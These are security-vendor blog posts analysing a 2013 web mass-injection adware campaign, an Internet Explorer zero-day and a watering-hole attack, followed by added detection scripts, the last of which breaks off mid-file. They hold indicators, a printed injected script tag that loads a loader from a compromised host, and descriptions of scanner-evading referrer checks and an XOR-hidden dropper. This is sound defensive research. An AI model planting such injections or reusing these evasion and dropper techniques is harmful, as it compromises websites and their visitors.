‘GWload’ – The ‘Social Engineering’ Based Mass Injection Making Its Rounds

Websense® Security Labs™ ThreatSeeker® Intelligence Cloud has identified a new mass injection campaign making its rounds, compromising tens of thousands of legitimate websites and injecting content into them. This campaign is an evolution and expansion of an existing injection campaign that Websense® Security Labs™ has been monitoring since January of this year. Our telemetry shows that, to date, at least 40,000 compromised pages have been observed on the Web, redirecting users and tricking them into installing rogue software.

We see parallels between the injected websites and those affected by the “cookiebomb” mass injection, which was mostly associated with delivering “ransomware” payloads (our blog on the CookieBomb attack is here). Let’s get back to GWload…

 

We’ve made three key observations about this campaign. The first is the use of a social engineering technique to lure users into downloading malicious and undesirable content. Although most website injections in the wild redirect to exploit websites, this dominant campaign shifts the focus to social engineering rather than exploits to get unwanted content installed on victims’ machines. Our second observation is that the emergence of this campaign coincides with the arrest of the Blackhole Exploit Kit author ‘Paunch,’ which could explain the change in mass injection tactics as actors move from serving exploits to social engineering. This shows that the cyber underground may have contingency plans in place to adapt and react quickly to change. Our third key observation is that the campaign employs an ‘end to end’ infrastructure of legitimate websites. These legitimate websites are compromised so that they ultimately serve rogue content. The cyber criminals deploy code to defeat ad-blockers and code that ‘locks content’, blocking access to the website until a certain action is completed (a technique that in the past has been used with Cost Per Action (CPA) lead-based scams on the Facebook platform). To be clear, conducting CPAlead campaigns is not illegal; however, using CPAlead advertising methods that deceive users is. The ultimate aim of the lure is to install rogue software that compensates the actors through an affiliate program. In this blog we’re going to cover the different aspects of this mass injection campaign and share relevant telemetry.

 

Executive Summary 

 

  • Thousands of legitimate web pages are compromised in a mass injection campaign we dubbed ‘GWload’ and detected as early as the week of the 14th of October.
  • The campaign employs a social engineering technique to lure users into downloading rogue content.  Most mass injections found in the wild typically redirect to exploit websites; employing a social engineering technique instead of exploits seems to be a shift in focus to push software installations, adware, and spyware without the user’s consent.
  • The expansion and emergence of this campaign that employs social engineering techniques also coincides with the arrest of the Blackhole Exploit Kit creator ‘Paunch,’ which could explain the change in tactics of different cyber-crime actors with their mass injections, as they move from serving exploits to social engineering. This suggests that actors in the cyber underground may have contingency plans in place to adapt and react quickly to change.
  • The campaign employs an ‘end to end’ infrastructure comprised of legitimate websites under the control of cyber criminals. It was observed that injected code doesn’t lead to specially crafted payload websites but to other legitimate websites that became compromised and then are used as the serving points for rogue software installations. This effectively allows rogue content to be harder to detect and defeats detection systems that rely only on reputation.
  • Actors behind this campaign employ a set of open source tools to defeat ad-blocking technologies. The actors aim to monetize successful rogue installations through affiliate programs. The main payload script of the lure uses ‘content locking’ tactics that are very common with Cost Per Action (CPA) scams that propagate on Facebook, and the code used in this specific case shows a copyright notice from Adscend Media LLC, which is a company that was sued by Facebook for engaging in scams and fraudulent activity on the Facebook platform.

 

Distinct geographical locations of compromised web-servers:

 

Number of injected web pages spotted in the last 7 days:


 

The Lure 

 

Users who browse to a compromised injected website are immediately redirected ‘drive-by’ style to a second compromised website that (a) effectively blocks all content of the legitimate website and (b) shows them this notification: “VLC player is required for this website, click DOWNLOAD NOW”. VLC media player is a legitimate open source media player (the official page is located here). However, VLC player is also known to be abused and bundled with some non-legitimate software, and this is the case with all the “VLC media player” installations that take part in this mass injection campaign; they’re all “complemented” with a generous number of unexpected rogue installations of additional software.

 

The lure – how content is ‘locked’ with conditional access; this is what the user sees when browsing to an injected website (click to enlarge):

 

A website’s main page source code, injected with ‘GWload’ (click to enlarge):

 

A website’s Javascript file source code, injected with ‘GWload’ code alongside a ‘Cookiebomb’ injection (click to enlarge):

 

Infection & how money is made


If a user is convinced that it is necessary to download and run the file to access the website’s content, then unexpected, rogue installations of software will commence on the user’s machine. These software installations allow the actors behind this campaign to monetize infections. ‘Monetizing’ is the keyword here, because the binaries that are downloaded come from the infrastructure of a company called ‘Amonetize LTD’, a company that specialises in ‘pay per install’ schemes. Basically, the company pays participants in its ‘pay per install’ programs. Here is the definition from the website’s FAQ section, to make things clearer:

 

What is Amonetize? (Click to enlarge):

 

A user who runs the binary will immediately see an installation dialog box for ‘VLC player’ (see Image 1 below). So far so good: it has the ‘VLC Player’ logo. But it also has some information written in small print that the user should probably read. The small print hints at what’s coming, but most users at this stage are eager to get access to the website (or curiosity plays a part), and they click ‘Next’ to advance the installation of what they think is the video player. At this stage the open source ‘VLC player’ package is downloaded from the official website, but it doesn’t get installed. The next stage asks the user to install ‘Registry Helper’ (Image 2). There’s a decline button, and choosing to decline does mean that app doesn’t get installed. But clicking the ‘Next’ button brings a flood of bad news (Image 3), because from that stage on a lot of software is installed silently on the user’s machine, in different locations. The initial binaries that get downloaded, run, and installed are “Updater.exe”, downloaded from hxxp://cdn3.anotherdownload.com/updater/Updater.exe, and “sctmp.exe”, downloaded from hxxp://downloadspot7.shoppingchip.info/sctmp.exe.

 

 

Image 1 – Looks like “VLC Player” Installation, but the small print allows for some extras:

 

Image 2 – “Registry Helper” opt-in: 


 

Image 3 – The stage where software installations that take part in the Cost Per Action (CPA) scheme are commenced:


 

 

Here is a summary of all files\applications taking part in the Cost Per Action (CPA) scheme that get installed and run on the machine:

 

SHA1: bce71547dec74a39cca484a3b5a2ec9c844c4575 , filename: sctmp.exe (ShoppingChip)

SHA1: d52e3715b0d1f4a43e9aff2347e6b1fc88a3b7e8 , filename: 294823_.exe (ShoppingChip)

SHA1: 2315be5c129efe4fac36850b225ca2ebeec196ae , filename: 0j.exe (ShoppingChip)

SHA1: 0b9e805077320b0ce1e6620488bd34f1c4d7827e , filename: w.dll (ShoppingChip)

SHA1: 184c60aafbb12d1023b1ce2aff4d3708607a75a1 , filename: W.x64.dll (ShoppingChip)

SHA1: 668437f834b3f4e1e2b6383936528d56c17ca3eb , filename: Updater.exe (Amonetize)

SHA1: 44541bd12d0c1454310babb38ef65579544bb7cb , filename: bundlesweetimsetup.exe (SweetIM\SweetPacks)

SHA1: c077be880adcca469cb8009f9a3f4170497fa011 , filename: spacksyahoo_717_active.exe (SweetIM\SweetPacks)

SHA1: 827ab81eb687b4fe88ac500d6dae475ba7dd2daf , filename: ExtensionUpdaterService.exe (SweetIM\SweetPacks)

SHA1: 3e1726b904874101c93b51c784917f2aedd3863c , filename: Extension32.dll (SweetIM\SweetPacks)

SHA1: ac57ebd667acf5734d3fe5c7f1982440b507bcff , filename: installerhelper.dll (SweetIM\SweetPacks)

SHA1: 2eabe4f755213666dbbbde024a5235ddde02b47f , filename: registry.dll (SweetIM\SweetPacks)

SHA1: 6c4c7be6be33413be0017bb31a78921f61b6cd3b , filename: sweetiesetup.exe (SweetIM\SweetPacks)

SHA1: b9fb23cbe82811b97e6c3ad0dac182b8f99c9e9d , filename: 1382915777_45645062_228_4.tmp (SweetIM\SweetPacks)

SHA1: e1606da015762918176602bf3dd696b88351535b , filename: WSSetup.exe (SweetIM\SweetPacks)

SHA1: 63ec07e905abf4f8bbf85b0b721820e4533cd81e , filename: SetXPDriverSigningPolicy.exe (SweetIM\SweetPacks)

SHA1: a7c1b35254f2c1fc56648823b59fbba6577aa4e7 , filename: Coupon_Scout_102.exe (CouponScout)

SHA1: 8c13adefc4a1726a1f12f986c7f7b77375b8a6e2 , filename: psupport.dll (Bprotector)

SHA1: 7efc16c587164083105dd52683ca453f9a64fb17 , filename: cs-browser-assistant-2-0.exe (CS Browser Assistant) 

SHA1: 2ec3760fd906e8dfe827cdbf552b8786348b1121 , filename: Wwyqza.exe (CS Browser Assistant) 

SHA1: 868bc131566a670d9a27742f1f499f2e36107a33 , filename: 44286.crx (CS Browser Assistant) 

SHA1: ee311464e5cee2ea7be63a09a7bd8aaa470243aa , filename: 44286.xpi (CS Browser Assistant) 

SHA1: 9efbf2f1d28936e18b2a17cb853e8623f192e292 , filename: CS Browser Assistant 2.0-bho.dll (CS Browser Assistant)

 

Here are the Registry modifications that suggest Browser Helper Objects, services, and toolbars: 

 

URLSearchHook: SweetIM ToolbarURLSearchHook Class – {EEE6C35D-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgHelper.dll

 

BHO: CrossriderApp0044286 – {11111111-1111-1111-1111-110411421186} – C:\Program Files\CS Browser Assistant 2.0\CS Browser Assistant 2.0-bho.dll

 

BHO: Updater By Sweetpacks Helper – {DEDAF650-12B8-48f5-A843-BBA100716106} – C:\Program Files\Updater By Sweetpacks\Extension32.dll

 

BHO: ShoppingChip – {EBFD7D4B-EF00-3F7D-A2C7-4C6C23DCAFAC} – C:\Program Files\ShoppingChip\W.dll

 

BHO: SWEETIE – {EEE6C35C-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll

 

Toolbar: SweetPacks Toolbar for Internet Explorer – {EEE6C35B-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll

 

Service: Updater By Sweetpacks – Unknown owner – C:\Program Files\Updater By Sweetpacks\ExtensionUpdaterService.exe

 

 

To summarize this section, a significant amount of unexpected and unwanted software may have found its way to the user’s machine, including: ShoppingChip, SweetIM\SweetPacks, Amonetize Updater, CouponScout, Bprotector & CS Browser Assistant.  We hope there won’t be more.

 

 

How the lure code operates, and relationship to rogue CPAlead campaigns on Facebook

 

The script loaded by a website injected with ‘GWload’ also resides on an injected website and follows a two-stage process (the related source code is shown in the images below). The first stage is the ‘locker page loader’, which prepares the browser to load the ‘content locker page’. Among its various actions, it prepares the frame in which the ‘content locker page’ is going to reside and sets a cookie on the user’s machine. At this stage, the script won’t redirect to the ‘content locker page’ and lock the website’s content if no referrer was set on the request. This means that the ‘content locker page’ will show and activate only if the user was referred from another website, such as a search engine result; a direct visit with no referrer, as a webmaster or an automated scanner would typically make, never triggers it. If everything checks out at the first stage, the ‘content locker page’ is loaded; it blocks the website’s legitimate content from the user, permitting access only if ‘VLC Media Player’ is downloaded and installed. Digging a bit deeper and searching the web for references to the code fragment ‘gwloaded = false’ shows that it is associated with tools that aim to evade browser-based ad-blocking software. In fact, the comments at the start of the script claim in plain sight that the script and its contents are the intellectual property of Adscend Media LLC. Adscend Media LLC is a company that was sued by Facebook; Facebook claimed that the company engaged in scam and fraudulent activity on the Facebook platform. A lot of the scams on Facebook employ social engineering tricks similar to this mass injection: they typically condition access to content on certain steps being executed by the user; the conditions vary and may include filling out a survey or installing software. This model of online advertising is called “Cost Per Action” (CPA) or “Pay Per Action” (PPA), where the advertiser pays for each specified action completed by the user.

 

Once the ‘content locker page’ loads, it prompts the user to download the software via several links that all lead to the same location at trackergeo.com. This domain acts as a statistics collector; checking the Whois data for that domain shows it was registered by a ‘zhang jing’ with the email address derqe43@qq.com. A reverse Whois lookup on that email address reveals more low-reputation domains, registered roughly 14-20 days ago:

 

fulllocalbabez.com

nicelocalbabez.com

shishang558.com

malelocalbabez.com

teng8teng8.com

ownlocalbabez.com

gxtopit.com

lowlocalbabez.com

okaylocalbabez.com

xjjiaoy.com

nulllocalbabez.com

wiselocalbabez.com

lizhengqu.com

xjyinxiao88.com

 

 

trackergeo.com redirects to hxxp://www.winmediaplayer.com/direct-download.html?version=1.1.8.21&iaff1=10084&ci=3793&capp=MediaPlayer, which further redirects to download the installation file at hxxp://www.askdownload.com/download.php?version=1.1.8.21&prefix=VLCMediaPlayer&campid=3793&capp=MediaPlayer&iaff1=10084.

 

The downloaded file, named VLCMediaPlayer__3793_il256.exe (SHA1: 7e8593c36209afa8f065ac00aa3d3b40b738dc00), is the main file that starts the process of installing unwanted software, as described in the previous section. A summary report from Websense’s ThreatScope™ sandbox shows that the file tries to connect to and download suspicious content from idyllicdownload.com/index.php, a website registered by Amonetize LTD.

 

winmediaplayer.com and askdownload.com are registered by Amonetize LTD. Note the affiliate ID carried in the iaff1 parameter of the URLs above: 10084. This number is how Amonetize tracks and associates downloads with affiliates and compensates them accordingly. A reverse Whois lookup on recent domains owned by Amonetize LTD turns up some interesting matches:

 

invitedownload.com

offerswizard.com

paidtoinstall.com

existentdownload.com

offerswizard.net

winmediashare.com

ezitenom.com

varietydownload.com

accuratedownload.com

bestflashplayer.net

amonetize-reports.com

winflashdownload.org

smashflashplayer.org

offerswizard.org

bestflashplayer.org

winpdfcreator.com

wintvapp.com

bestflashplayer.com

amonstat.com

mindownload.com

keenondownload.com

fixeddownload.com

amusingdownload.com

alwaysdownload.com

usualdownload.com

unusualdownload.com

winflashdownload.info

winapptv.com

preferdownload.com

promptdownload.com

hottestdownload.com

3rddownload.com

naturaldownload.com

realmdownload.com

idyllicdownload.com

wishdownload.com

validdownload.com

okaydownload.com

stylishdownload.com

smashflashplayer.info

winflashplayer.com

winflashdownload.net

anotherdownload.com

winnerdownload.com

properdownload.com

beyonddownload.com

insidedownload.com

visiondownload.com

vitaldownload.com

downloadokay.com

winflashplayer.net

smashflashplayer.net

winpdfreader.com

statedownload.com

soledownload.com

smashflashplayer.com

worthdownload.com

immensedownload.com

intactdownload.com

chicdownload.com

honestdownload.com

downloadfixed.com

downloadwish.com

sensedownload.com

gethdplugin.com

winvlc.com

win7zip.com

intodownload.com

optdownload.com

downloadalways.com

brainydownload.com

thisisdownload.com

justlydownload.com

2nddownload.com

commondownload.com

steerdownload.com

winflashdownload.com

compress-it.com

 

The first stage – the ‘locker page loader’:


 

 

The second stage – the ‘locker page’:


 

 

 

Telemetry 

 

Our telemetry shows that different and diverse sets of websites are affected by this attack. Below is a chart that shows the top 20 categories of websites that have been injected with ‘GWload’. Leading the chart are websites that fall under the ‘Business and Economy’ category, followed by ‘Sex’ websites, ‘Web hosting’ websites, and ‘Information Technology’ websites. Closing the top five of injected websites is the ‘Travel’ category.

 

Top 20 categories of websites injected with ‘GWload’ (click to enlarge): 


 

 

Top Ten Injected Countries:

 

 

Detection

 

An injected website can be identified by looking for the following two strings in the page’s source code (the first is the variable declaration between script tags, the second the tail of the external script tag that pulls the loader from a second compromised site):

1. >var gwloaded = false;<

2. .php" type="text/javascript"></script>

Injected code example:

<script type="text/javascript">var gwloaded = false;</script>

<script src="http://brandway.home.pl/blekitna_pl/mDJkxzca.php" type="text/javascript"></script>
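The two strings above can be turned into a simple page-source check. The script below is an added example, not Websense code or part of the injected script: the two markers are the ones quoted above and the loader URL in the injected sample is the one from the snippet, but the sample pages themselves are constructed so the check runs offline. It treats a lone .php script as a hint only, because legitimate sites load .php scripts all the time, and flags a page only when both markers are present.

```python
"""GWload page-source check (added example, not Websense code)."""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Marker 1: the flag the loader script sets, also what the ad-blocker
# evasion tooling keys on, which is what makes it a usable signature.
GWLOADED_RE = re.compile(r"var\s+gwloaded\s*=\s*false\s*;", re.IGNORECASE)

# Marker 2: an external <script> whose src ends in .php and that declares
# type="text/javascript".  The src is captured so the second compromised
# site hosting the loader can be blocked or investigated.
PHP_SCRIPT_RE = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']+\.php)["'][^>]*\btype\s*=\s*["']text/javascript["'][^>]*>""",
    re.IGNORECASE,
)

# Constructed sample page carrying the injection quoted in the post.
INJECTED_SAMPLE = """<html><head><title>Shop</title>
<script type="text/javascript">var gwloaded = false;</script>
<script src="http://brandway.home.pl/blekitna_pl/mDJkxzca.php" type="text/javascript"></script>
</head><body>legitimate content</body></html>"""

# Constructed clean page that legitimately loads a .php script; it must
# not be flagged on its own.
CLEAN_SAMPLE = """<html><head>
<script src="/assets/stats.php" type="text/javascript"></script>
</head><body>hello</body></html>"""


def scan_page(html: str) -> Dict[str, object]:
    """Report both markers for one page; only the combination counts as injected."""
    loaders: List[str] = PHP_SCRIPT_RE.findall(html)
    has_flag = GWLOADED_RE.search(html) is not None
    return {
        "gwloaded_flag": has_flag,
        "php_script_srcs": loaders,
        "injected": has_flag and bool(loaders),
    }


def loader_hosts(html: str) -> List[str]:
    """Hostnames of the second-stage loader scripts, for blocking or pivoting.
    Relative srcs (same-site scripts) have no hostname and are skipped."""
    hosts: List[str] = []
    for src in PHP_SCRIPT_RE.findall(html):
        host = urlparse(src).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, scan_page(page), loader_hosts(page))
```

Run it over a crawl of your own sites; any hit in `php_script_srcs` that points off-site is worth a look even when `injected` is false, since the post notes the loader script sits on a different compromised host.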

 

ThreatSeeker detecting the insertion of malicious code to legitimate website (click to enlarge):


 

 

Summary

 

In this blog we described a mass injection campaign that emerged in the past two weeks and that continues to affect thousands of websites across the globe. We noticed that this mass injection uses a social engineering trick that locks legitimate websites’ content to lure potential victims to install applications that participate in Cost Per Action (CPA) advertising schemes. This change in tactics that occurred in the past two weeks coincides with the arrest of the Blackhole Exploit Kit author ‘Paunch,’ which could suggest that actors adapt to change rapidly to keep their attack going. It was also apparent that certain scripts used by actors to serve social engineering-based attack vectors are interchangeable across different attack platforms; we witnessed with ‘GWload’ that code that mostly was used in social engineering-based attacks on Facebook has now migrated and is used with mass injections.

 

Websense customers are protected from injected websites and the different stages of this threat with our Advanced Classification Engine – ACE.

Zero-Day Attack for Internet Explorer (CVE-2013-3897) Goes High Profile

Websense® Security Labs™ has seen a new zero-day exploit for Internet Explorer (CVE-2013-3897) used in highly targeted, low-volume attacks in Korea, Hong Kong, and the United States, as early as September 18th, 2013. Details of the vulnerability (CVE-2013-3897) were shared by Microsoft in advance of today’s patch, which is now available for download. Websense ThreatSeeker® Intelligence Cloud was able to correlate those attacks and build a profile of the geographical locations where the attacks began and of the targeted industries, which is described later in this post. In addition, we found that the targeted attacks that utilized the exploit for CVE-2013-3897 also included older exploits, such as CVE-2012-4792, for certain targets.

 

Executive Summary

  • Websense ThreatSeeker Intelligence Cloud has seen a new zero-day exploit for Internet Explorer (CVE-2013-3897) used in highly targeted, low-volume attacks in Korea, Hong Kong, and the United States, as early as September 18th, 2013.
  • Websense telemetry indicates that the attack campaign using the same infrastructure and the older exploit CVE-2012-4792 began as early as August 23rd, 2013, before transitioning to CVE-2013-3897 in mid-September.
  • A patch has been supplied by Microsoft and is available for download.
  • Microsoft took this opportunity to patch a previous Internet Explorer vulnerability, CVE-2013-3893. The patch for both vulnerabilities can be found at this link: ms13-080.
  • Our ThreatSeeker Intelligence Cloud reported that the attacks targeted primarily financial and heavy industries in Japan and Korea.
  • Our telemetry shows that the actors behind these attacks used their infrastructure to launch older exploits for Internet Explorer, such as CVE-2012-4792, which was first seen at the start of 2013.
  • Websense has protected our customers from the recent Microsoft Internet Explorer CVE-2013-3897 and CVE-2013-3893 exploits observed in the wild by using real-time analytics that have been in place for nearly three years.

     

Vulnerability Details for CVE-2013-3897

 

The vulnerability is caused by a “use-after-free” error when processing “CDisplayPointer” objects within mshtml.dll and is generically triggered via the “onpropertychange” event handler; it could be exploited remotely by attackers to compromise a system via a malicious web page. The specific exploit that has been seen uses a heap spray to allocate memory and employs a ROP technique around the 0x14141414 address (as confirmed by the Microsoft Security Response Center).

 

A sample of one of the specific exploit pages spotted in the wild shows JavaScript code that appears to target only Internet Explorer 8 on 32-bit Microsoft Windows XP with a Japanese or Korean language setting.

 


 

The attacks were served by directly browsing to raw IP addresses and were spotted being served from selected IP addresses in the network range 1.234.31.x/24, which is geolocated in the Republic of Korea. The attack lure pages (the starting point of the exploit chain) on that network range share the same URL pattern; they all have the URL structure <x.x.x.x>/mii/guy2.html.

 

We also spotted that a URL with the same structure on the same network range was used to serve an older, already disclosed exploit for Internet Explorer, CVE-2012-4792, also in a low-volume and targeted way. Those attacks were launched at the end of August this year. Here is a snippet of the page located at hxxp://1.234.31.142/mii/guy2.html. In the case of CVE-2012-4792 in this campaign, it looks like there were no conditional checks for operating system, browser, or language prior to serving the exploit, which means it was served to the target unconditionally.

     

     

     

       

Telemetry

 

Looking at the broader picture and taking into account all the related attacks we’ve seen served from the IP range 1.234.31.x/24, we found some interesting information that sheds more light on the high-level agenda of the perpetrators of this campaign. The next pie chart shows the different industries we saw being targeted by this campaign in the last month. The chart reveals that the perpetrators’ interest is broad: they aim to compromise different types of industries that aren’t necessarily related to each other:

 


 

Another interesting finding is that this attack campaign is global, although, as described earlier, the attack pages check whether the operating system’s language is either Japanese or Korean before serving the CVE-2013-3897 exploit. The targeted entities of Korean or Japanese origin are not limited geographically to those countries. For example, one entity belonging to the Engineering and Construction industry was targeted at one of its locations in the U.S. In addition, as mentioned before, the pages serving CVE-2012-4792 didn’t employ any conditional checks before issuing the exploit, so the potential targets in that case could be more varied. Indeed, we found that in this campaign a government entity located in the U.S. was targeted with CVE-2012-4792. The next pie chart shows the distribution of the targeted geographical locations of this campaign:

 

 

 

 

Exploit Locations vs. Targets

Websense telemetry indicates that the CVE-2013-3897 exploit has been hosted on servers in Seoul, South Korea, at the IP addresses 1.234.31.153, 1.234.31.142 and 1.234.31.154. We have seen this exploit targeting computers located in the United States, Hong Kong, and Seoul, South Korea.
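The hosting range, the fixed lure path and the three serving IPs above are enough for a retrospective sweep of web-proxy logs. The script below is an added example, not Websense code: the /24, the /mii/guy2.html path and the three IPs are taken from this post, while the log format and the log lines are constructed so it runs offline. It separates full lure hits from other raw-IP requests into the same /24, and tags each client whose User-Agent matches the IE8-on-XP profile the exploit page selected for; the Japanese/Korean locale check needs the Accept-Language header, which this constructed log does not carry.

```python
"""Proxy-log sweep for the CVE-2013-3897 lure pattern (added example)."""
import ipaddress
import re
from typing import Dict, List, Optional

LURE_NET = ipaddress.ip_network("1.234.31.0/24")        # hosting range from the post
LURE_PATH = "/mii/guy2.html"                            # lure path from the post
KNOWN_HOSTS = {"1.234.31.153", "1.234.31.142", "1.234.31.154"}  # serving IPs from the post

# Constructed log format: <client_ip> "<user_agent>" <url>
LINE_RE = re.compile(r'^(\S+)\s+"([^"]*)"\s+(\S+)\s*$')
# Only raw-IP URLs are of interest; the lure pages were reached by IP, not hostname.
RAW_IP_URL_RE = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/\S*)?$")

# Constructed sample log lines (client IPs and UAs are illustrative).
SAMPLE_LOG = """\
10.0.0.5 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" http://1.234.31.142/mii/guy2.html
10.0.0.7 "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0" http://www.example.org/index.html
10.0.0.9 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" http://1.234.31.153/mii/guy2.html
10.0.0.11 "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" http://1.234.31.9/other/page.html
10.0.0.13 "curl/7.30.0" http://203.0.113.5/mii/guy2.html
"""


def classify_url(url: str) -> Optional[str]:
    """'lure' for the full pattern, 'range' for any other raw-IP request into
    the hosting /24, None for everything else."""
    m = RAW_IP_URL_RE.match(url)
    if not m:
        return None
    try:
        ip = ipaddress.ip_address(m.group(1))
    except ValueError:
        return None
    if ip not in LURE_NET:
        return None
    path = m.group(2) or "/"
    return "lure" if path == LURE_PATH else "range"


def client_profile(user_agent: str) -> str:
    """The exploit page seen in the wild appears to target IE8 on 32-bit XP.
    The UA reveals browser and OS (XP reports 'Windows NT 5.1'); the
    Japanese/Korean locale check would need Accept-Language as well."""
    is_ie8 = "MSIE 8.0" in user_agent
    is_xp = "Windows NT 5.1" in user_agent
    return "ie8-xp" if (is_ie8 and is_xp) else "other"


def find_hits(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request that touches the hosting range."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; a real sweep would count these
        client, ua, url = m.groups()
        kind = classify_url(url)
        if kind is None:
            continue
        host = RAW_IP_URL_RE.match(url).group(1)
        hits.append({
            "client": client,
            "host": host,
            "kind": kind,
            "known_host": "yes" if host in KNOWN_HOSTS else "no",
            "profile": client_profile(ua),
        })
    return hits


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

A 'lure' hit from an 'ie8-xp' client is the case to escalate; a 'range' hit from any client still deserves a look, since the same /24 served the older CVE-2012-4792 pages without any client checks.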

       

Summary

 

In this blog, we’ve taken a look at a targeted attack campaign that has been in circulation for the past month. It appears that the perpetrators behind this campaign target entities from different industries across a selected set of geolocations, which reaffirms the notion that these kinds of campaigns operate on a global scale and focus on a variety of industries that are not necessarily related. The perpetrators are innovative and employ zero-day exploit code, but their work also appears to be customized for their targets, since we witnessed older, already-patched exploits being used in selected attacks.

 

Update 10/10/2013 – Websense researchers have confirmed that the attacks seen from this threat actor beginning August 23rd, 2013 were utilizing the CVE-2012-4792 exploit. The first observed use of CVE-2013-3897 as part of this campaign was on September 18th, 2013.


Israeli Website for “International Institute for Counter-Terrorism” Waterhole Attack Serving CVE-2012-4969

 

Websense® Security Labs™ and the Websense ThreatSeeker® Network have detected that the government-related websites ict.org.il and herzliyaconference.org have been involved in a “waterhole” attack and are injected with malicious code that serves an exploit for the Internet Explorer vulnerability CVE-2012-4969. The first website describes itself as the “International Institute for Counter-Terrorism”. Both websites seem to be connected to and governed by a leading Israeli academic institution, the IDC.

 

The malicious code found on the two websites is identical and was identified as CVE-2012-4969, an Internet Explorer vulnerability that was a zero-day at the time and was found being exploited in the wild in September 2012. It was found by Eric Romang from Zataz.

 

From our initial checks, the websites still serve the malicious code on specific paths, and have been serving it from as early as the 23rd of January 2013. At the time of this writing, the malicious code on ict.org.il appears to be fully functional, but the malicious code on herzliyaconference.org doesn’t seem to be functional (the main page that initiates the exploit seems to have been removed; although the subsequent pages are still available, on their own they won’t serve a successful exploit).

 

The attack seems very similar to the spear-phishing attacks we reported on with the “Rotary Domains” (Part 1 & 2) that served CVE-2012-4792, the same zero-day that was found on cfr.org. The attack on the IDC uses a Flash file to conduct a “heap spray” attack. The Flash file contains the misspelled string “heapspary”. According to Symantec, this string may be evidence that the “Elderwood” group is behind this attack, because of the similarity to the cfr.org attack, which held the same string “heapspary” in a Flash file as well. We’re not completely convinced by this theory; it may indeed suggest a connection to the “Elderwood” project, but it may instead suggest the use of the same toolkit by different perpetrators.

 

One of the most interesting techniques employed by this attack, which we described in detail in our previous “Rotary Domains” posts, is that the dropped malware is actually embedded as an XORed list of bytes on the page, assigned to a JavaScript variable with a marker at the start of the stream. After exploitation succeeds, the shellcode on the client side searches memory thoroughly for the marker “KKONG”. When the marker is found, the stream following it is extracted and de-XORed to form the actual malware binary, which is then run. This technique is also good for sandbox evasion and reminds us of the “drive-by cache” techniques that have been popular with spear-phishing attacks in the last two years. The difference here is that it’s sort of a “drive-by marked memory object”.

 

Websense Security Labs™ has contacted the IDC to report the compromise; as of this writing we have not heard back from the IDC.

 

The Israeli website for the “International Institute for Counter-Terrorism” and its mission statement is shown here:

       


       

       

       

       

Technical details

 

As described, the attacks on both websites are identical. The exploit chain starts in an HTML file in a dedicated directory. We’re not certain whether this specific path was sent in spear-phishing emails, or whether the main page of each website referred to this path. If you have any more details on this, please do let us know.

 

Here are the exploit chains for ict.org.il and herzliyaconference.org:


hxxp://www.ict.org.il/js/1.html -> Flash file loader (AceInsight report)

hxxp://www.ict.org.il/js/logo4969.swf -> Flash heap-spray + exploit.html loader

hxxp://www.ict.org.il/js/exploit.html -> Dropped file cache + Exploit Loader

hxxp://www.ict.org.il/js/Protect.html -> Exploit CVE-2012-4969

 

 

hxxp://www.herzliyaconference. org/_modules/80.html -> Flash file loader (AceInsight report)

hxxp://herzliyaconference .org/_modules/logo4969.swf -> Flash heap-spray + exploit.html loader

hxxp://herzliyaconference. org/_modules/exploit.html -> Dropped file cache + Exploit Loader

hxxp://herzliyaconference. org/_modules/Protect.html -> Exploit CVE-2012-4969

       

Let’s have a look at the specific exploit chain on ict.org.il. The file 1.html is used just as a loader for the malicious file logo4969.swf. Besides loading the malicious file, there are no malicious indicators on the page, just the HTML Flash container/loader:

 


 

The loaded Flash file initiates a heap-spray attack, but it also acts as the caller of the Exploit Loader page exploit.html: ActionScript commands embedded in the Flash file evaluate some JavaScript on the page and load exploit.html, as seen in the next snippet from the file:

 


 

 

exploit.html holds some JavaScript code and an especially long variable. This variable starts with the marker “KKONG”, which is later searched for by the shellcode that resides inside the loaded Flash file on the client side. The stream is obfuscated with a simple XOR with 0xBF. The page also loads the actual exploit page in an iframe pointing to Protect.html:

 

 

 

Protect.html holds the exploit code for CVE-2012-4969. The exploit code is obfuscated with a simple obfuscation technique:

 

 

 

After the exploit is triggered by Protect.html, execution jumps to the sprayed shellcode on the heap. The shellcode then scans memory for the marker mentioned earlier, “KKONG”. Once the marker is found, the shellcode takes the stream following the marker and de-XORs it with 0xBF to form a valid executable file. That file is then written to the machine’s Windows temporary folder and executed to infect the machine with a persistent backdoor.
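The marker-plus-XOR scheme above is easy to reverse offline, which is useful when the Flash stage is broken (as on herzliyaconference.org) and only exploit.html is available. The script below is an added example, not code from the attack pages or from Websense: the marker name “KKONG” and the key 0xBF come from this post, but the post does not show how the bytes are encoded inside the JavaScript string, so the example assumes a hex string directly after the marker, and the “executable” it hides is a constructed MZ-header stub so that everything runs offline. It also goes one step beyond the fixed key: rather than hard-coding 0xBF it recovers the single-byte key from the expected “MZ” header, so the same carver works if another sample of the toolkit uses a different key.

```python
"""Carve the XOR-obfuscated executable behind the "KKONG" marker (added example)."""
import re
from typing import Optional, Tuple

MARKER = b"KKONG"      # marker named in the post
KNOWN_KEY = 0xBF       # key named in the post; recover_key() does not rely on it
HEX_RUN = re.compile(rb"[0-9a-fA-F]+")

# Constructed stand-in for the dropped binary: just enough of a DOS header
# to satisfy the 'MZ' check below.  Not a real executable.
FAKE_EXE = (b"MZ\x90\x00\x03\x00\x00\x00"
            + b"This program cannot be run in DOS mode.\r\n"
            + bytes(range(16)))


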